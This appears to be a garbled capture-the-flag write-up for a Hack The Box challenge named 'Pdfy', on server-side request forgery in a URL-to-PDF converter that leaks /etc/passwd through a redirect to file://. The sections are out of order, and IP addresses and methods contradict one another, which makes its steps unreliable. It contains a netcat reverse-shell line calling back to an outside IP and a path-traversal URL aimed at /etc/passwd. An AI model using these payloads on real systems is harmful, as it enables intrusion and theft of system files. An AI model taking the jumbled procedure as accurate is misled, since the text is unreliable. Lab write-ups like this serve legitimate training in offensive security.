Pdfy HTB Writeup (Updated)
The generated PDF will contain the contents of /etc/passwd, where the flag is appended. Download or view the PDF to obtain the flag.
# Close the socket
s.close()
# Establish a reverse shell
os.system('nc 10.10.14.12 4444 -e /bin/bash')
Your server responds with a 302 Redirect to file:///etc/passwd.
The modified PDF file is then uploaded to the system.
We can test this vulnerability by attempting to access a non-existent file using the file parameter:
While the box is straightforward, many beginners get stuck on the syntax or identifying the internal targets. This updated writeup covers the most efficient path to the user flag and explains the mechanics behind the exploit.
1. Enumeration: What are we working with?
Then, use ngrok to create a TCP tunnel to this port. This is an important nuance.
http://10.10.10.187/?file=../../../../etc/passwd
During our enumeration, we usually discover the application relies on an underlying HTML-to-PDF generation library (such as wkhtmltopdf). Understanding the technology stack is half the battle; it allows us to look for known Common Vulnerabilities and Exposures (CVEs) or configuration flaws specific to that software.
$ curl -s 10.10.11.206
<!DOCTYPE html>
<html>
<head>
<title>Pdfy</title>
</head>
<body>
<h1>Pdfy</h1>
<p><a href="pdf_file.pdf">Pdf File</a></p>
</body>
</html>
A web application that converts provided URLs into PDF documents. Vulnerability: Insecure URL handling during PDF generation.
(Note: If you use a reverse proxy or tunneling tool, use standard TCP forwarding configurations instead of standard HTTP modes to ensure headers pass smoothly without intermediary confirmation pages.)
Step 3: Execute the Payload Injection
Navigate back to the target .